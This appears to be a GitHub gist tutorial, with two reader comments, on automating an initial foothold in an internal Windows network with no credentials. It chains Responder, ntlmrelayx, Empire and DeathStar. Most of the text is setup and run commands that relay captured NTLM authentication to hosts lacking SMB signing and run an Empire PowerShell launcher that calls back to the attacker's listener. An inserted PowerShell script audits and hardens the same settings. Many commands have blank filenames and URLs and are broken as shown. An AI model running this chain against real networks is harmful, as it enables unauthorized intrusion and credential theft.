Pwning internal networks automagically


This document pools several awesome tools and blog entries together (see "Resources" at the end of this doc) in an attempt to automate the process of getting an initial foothold on a network in a situation where you have no valid credentials.

Download and install ntlmrelay

One quirk I'm still trying to figure out: if I install ntlmrelay before any of the other tools we'll use, these steps seem to work fine:

git clone /opt/impacket
cd /opt/impacket
pip install .

However, if I install other tools like Empire first, the impacket install complains that it cannot install/uninstall the updated version. After raising this issue, it looks like the way to handle that is:

sudo apt-get remove python-impacket
git clone /opt/impacket
cd /opt/impacket
pip install .

However, removing that package also rips out a bunch of others, so you then have to reinstall them with something like:

apt-get install crackmapexec enum4linux kali-linux-full keimpx polenum set smbmap sparta wol-e -y

So long story short: handle the ntlmrelayx install with care.

Download and install Empire

git clone /opt/empire
cd /opt/empire

Download Deathstar

git clone /opt/deathstar

Download responder

git clone /opt/responder

Now open /opt/responder/Responder.conf and set SMB and HTTP to Off:

[Responder Core]

; Servers to start
SQL = On
SMB = Off <-- it's usually "On" so change to "Off"
Kerberos = On
FTP = On
POP = On
HTTP = Off <-- it's usually "On" so change to "Off"
DNS = On

Create a list of targets that have SMB signing disabled:

mkdir /scripts
cd /scripts
/opt/responder/tools/ -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt
grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

The resulting targets.txt should contain one IP per line for each host with SMB signing disabled.
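The hosts that land in targets.txt are the ones to fix on the Windows side. This is an added example and not part of the gist: a PowerShell script (the -Enforce switch is my own convention) that audits the SMB signing, LLMNR and NetBIOS-over-TCP/IP settings this chain relies on and, with -Enforce, sets them to the hardened values.

```powershell
# Added example (not from the gist): audit, and with -Enforce remediate, the host settings
# this chain depends on: SMB signing not required and LLMNR/NetBIOS name resolution enabled.
# Run from an elevated PowerShell on the Windows host being checked.
param([switch]$Enforce)

# Documented Windows registry/policy locations for each setting and the value we want.
$checks = @(
    @{ Name = 'SMB server signing required'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
       Key  = 'RequireSecuritySignature'; Want = 1 }
    @{ Name = 'SMB client signing required'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters'
       Key  = 'RequireSecuritySignature'; Want = 1 }
    @{ Name = 'LLMNR disabled'
       Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
       Key  = 'EnableMulticast'; Want = 0 }
)

foreach ($c in $checks) {
    $current = (Get-ItemProperty -Path $c.Path -Name $c.Key -ErrorAction SilentlyContinue).($c.Key)
    if ($null -ne $current -and $current -eq $c.Want) {
        Write-Output "[OK]   $($c.Name) ($($c.Key)=$current)"
        continue
    }
    $shown = if ($null -eq $current) { 'not set' } else { $current }
    Write-Output "[FAIL] $($c.Name) (current: $shown, expected $($c.Want))"
    if ($Enforce) {
        # Policy keys may not exist yet on an unmanaged host; create the path before writing.
        if (-not (Test-Path $c.Path)) { New-Item -Path $c.Path -Force | Out-Null }
        Set-ItemProperty -Path $c.Path -Name $c.Key -Value $c.Want -Type DWord
        Write-Output "       -> set $($c.Key)=$($c.Want); restart the Server/Workstation service or reboot to apply"
    }
}

# NetBIOS over TCP/IP is configured per adapter: NetbiosOptions 2 = disabled (0 = DHCP default, 1 = enabled).
$ifRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
foreach ($adapter in Get-ChildItem $ifRoot) {
    $v = (Get-ItemProperty $adapter.PSPath).NetbiosOptions
    if ($v -eq 2) {
        Write-Output "[OK]   NetBIOS over TCP/IP disabled on $($adapter.PSChildName)"
    } else {
        Write-Output "[FAIL] NetBIOS over TCP/IP not disabled on $($adapter.PSChildName) (NetbiosOptions=$v)"
        if ($Enforce) { Set-ItemProperty $adapter.PSPath -Name NetbiosOptions -Value 2 -Type DWord }
    }
}
```

Run it without -Enforce first to see which of the listed hosts would still answer an unsigned SMB session or a multicast name query; in a domain the same values are normally pushed by Group Policy rather than set per host.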

Create a batch of scripts so you're ready to automate the pwnage!

sudo mkdir /scripts
cd /scripts
sudo echo "cd /opt/empire" >
sudo echo "sudo ./empire --rest --username empireadmin --password Password123" >>
sudo echo "sudo /opt/deathstar/ --listener-ip YOUR.IP -t 100" >
sudo echo "# In the script below, replace YOUR-POWERSHELL with what you get from Empire." >
sudo echo "sudo python /opt/impacket/examples/ -tf targets.txt -c 'YOUR.POWERSHELL'" >>
sudo echo "sudo python /opt/responder/ -I YOUR-LAN-INTERFACE -r -d -v" >

Note: my pal JF in Slack suggested the following tweak to make it easier to populate the machine's IP address:

sudo /opt/deathstar/ --listener-ip `ifconfig eth0 | grep inet | awk '{print($2)}' | head -n 1` -t 100

Now open all the scripts created in /scripts and adjust them as necessary. Note: you won't be able to completely fill in the necessary info for just yet, so wait until you get to the next section:

Set all scripts as executable

cd /scripts
chmod +x
chmod +x
chmod +x
chmod +x

Run Empire

Get Empire running in a screen session:

cd /scripts
screen -S empire -dm -L /scripts/

Run DeathStar

Get DeathStar running in a screen session:

screen -S deathstar -dm /scripts/

Get Empire PowerShell code for

Connect to the Empire screen session

screen -R empire

At the Empire prompt, run this command to get the DeathStar PowerShell code:

launcher powershell DeathStar

Now press Ctrl+A and then D to detach from the screen session. In /scripts there should be a screenlog.0 file, which logs everything happening in the Empire screen session. Run cat screenlog.0 and copy the entire chunk of code that starts with powershell and ends with something like 0238jfDAfhAdfAkdf==

Next, open /scripts/ and, where you see YOUR-POWERSHELL, paste the PowerShell you got in the previous steps. Remember that in this script there is a single-quote tick before powershell and a closing tick at the end of your PowerShell code; the pasted code has to sit between the two.


Run a new screen session with ntlmrelayx:

screen -S ntlmrelayx -dm /scripts/

Note: you might find that when running the console barfs up some weird error like:

Traceback (most recent call last):
  File "examples/", line 45, in <module>
    from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/servers/", line 1, in <module>
    from httprelayserver import HTTPRelayServer
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/servers/", line 27, in <module>
    from impacket.examples.ntlmrelayx.clients import SMBRelayClient, MSSQLRelayClient, LDAPRelayClient, HTTPRelayClient
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/clients/", line 3, in <module>
    from ldaprelayclient import LDAPRelayClient
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/clients/", line 17, in <module>
    from ldap3 import Server, Connection, ALL, NTLM, RESULT_SUCCESS, MODIFY_ADD
ImportError: cannot import name RESULT_SUCCESS

If that happens, you may need to rip out and replace your version of impacket. See the section above where I address this, as well as the GitHub issue here, which should help.

Launch Responder

Run a new screen session with Responder:

screen -S responder -dm /scripts/

Keep an eye on the Empire and DeathStar screen sessions to watch the shells come pouring in:

screen -R empire
screen -R deathstar

Have fun :-)

Quick start for next time

Put the following commands in a file called /scripts/ :

screen -S empire -dm -L /scripts/
screen -S deathstar -dm /scripts/
screen -S ntlmrelayx -dm /scripts/
screen -S responder -dm /scripts/

@wankcrack wankcrack commented Sep 8, 2020

Hi, I tried this manually, but I'm having an error when it comes to ntlmrelay. It seems that Empire runs automatically on port 80, then when you run ntlmrelay you get an error saying that the port is already in use.


@braimee braimee commented Sep 9, 2020

@wankcrack Thanks for the update. It's been a long while since I've used this exact approach so the email might be a bit outdated. However, I did see info that says byt3bl33d3r is working on an updated version of Deathstar so I may come back eventually to make this doc more current.
